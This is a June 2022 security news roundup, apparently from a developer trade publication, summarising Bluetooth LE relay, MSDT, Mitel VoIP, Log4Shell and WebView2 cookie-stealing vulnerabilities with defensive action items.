June 2022 Security Update: Microsoft Office, Mitel, and Bluetooth Vulnerabilities

Attack vectors multiply as threat actors explore new ways into systems and to access data.


BLE Vulnerability Discovered

If you develop solutions that leverage Bluetooth Low Energy (BLE), look into research by NCC Group. Sultan Qasim Khan, principal security consultant and researcher, has conducted the world’s first link layer relay attack on BLE. The hack tricked devices into thinking the owner was nearby and conceivably could enable attacks from anywhere in the world. Moreover, the hack is possible even when a vendor has incorporated encryption and latency bounding.

 Action Items:

  • Systems that use BLE as the sole technology for security should implement other security measures.
  • Require user interactions to unlock devices.
  • Disable passive unlock functions when the user’s devices have been stationary.
  • Read NCC Group’s technical advisory: BLE Proximity Authentication Vulnerability to Relay Attacks.

Microsoft Support Diagnostic Tool Can Be Used Against You

CVE-2022-30190 allows actors to hijack IT environments through endpoints running Windows or MS Office. A remote code execution vulnerability in Microsoft Support Diagnostic Tool (MSDT) can allow a hacker to run arbitrary code with privileges of the calling application. This enables the hacker to install programs, view, change or delete data, or create new user accounts.

This vulnerability affects 41 products, including Windows 7 to 11, Server 2008 to 2022, and Office, Office 2016, 2021, and 2022. Microsoft issued a patch on June 14, 2022, along with patches for more than 50 other vulnerabilities and issues.

 Action Items:

Dirk Schrader, resident CISO (EMEA) and VP of security research at Netwrix, suggests that to increase security:

  • Closely monitor changes within an organization’s systems, especially system folders, and detect any unwanted processes.
  • Establish a set of Windows group policies that lock down the system so the exploit can’t execute functions.
  • Stay vigilant for escalations, such as combining the exploit with spear-phishing.

He adds, “The similarities with Log4shell, which made headlines in December 2021, are striking. Same as it, this vulnerability is about using an application’s ability to remotely call for a resource using the URI scheme and not having safeguards in place. We can expect APT groups and cyber crooks to specifically look for more of these as they seem to offer an easy way in.”

Ransomware Attack Attempted on a VoIP Device

Cybersecurity firm CrowdStrike traced a ransomware attack attempt to a Mitel VoIP appliance, resulting in the creation of CVE-2022-29499. Attackers used a novel remote code execution exploit to gain access and used anti-forensic techniques on the VoIP device to try to hide their activity. The zero-day exploit was patched.

Action Items:

  • Mitel has provided a script for remediation; address this critical vulnerability as soon as possible.
  • See the security advisory.

Log4Shell in VMware Horizon Systems Is Still a Vulnerability

CISA issued an alert on June 23, 2022, warning that threat actors, including state-sponsored actors, continue to exploit CVE-2021-44228 (Log4Shell) in VMWare Horizon and Unified Access Gateway (UAG) servers. The vulnerability has been an issue since December 2021 when threat actors have exploited unpatched systems.

Action Items:

  • Update all VMware Horizon and UAG systems to the most updated versions.
  • If you didn’t apply all updates for Log4Shell issued in December 2021, treat the system as compromised.
  • Minimize the attack surface by hosting essential services on a segregated network with strict access control and web application firewalls (WAFs) in front of public-facing services.
  • If a compromise occurs, immediately isolate the affected systems, collect and review logs, data, and artifacts, consider engaging support from an incident response organization, and report incidents to CISA at report@cias.gov or 888-282-0870.

Phishing Attack Bypasses MFA

The WebView2-Cookie-Stealer is enabling hackers to steal a victim’s authentication cookies so they can bypass multifactor authentication (MFA) and log into accounts with stolen credentials. Bleeping Computer explains that the attack includes using a WebView2 executable that opens a website login form inside the application. Using WebView2, a hacker can access cookies and inject JavaScript that logs keystrokes, steals authentication cookies, and send them to a remote server.

Cybersecurity researcher mr.dox told Bleeping Computer that the attack requires social engineering – the attacker has to convince a user to download and run the malicious application.

Action Items:

  • Educate users on email security best practices.
  • Don’t download applications from untrusted sources.
  • Make sure antimalware is up to date.

For more security updates and insights, visit DevPro Journal’s Security resources page.

Jay McCall

Jay McCall is an editor and journalist with 20 years of writing experience for B2B IT solution providers. Jay is a cofounder of Managed Services Journal and DevPro Journal.

Zebra Workstation Connect
Jay McCall

Jay McCall is an editor and journalist with 20 years of writing experience for B2B IT solution providers. Jay is a cofounder of Managed Services Journal and DevPro Journal.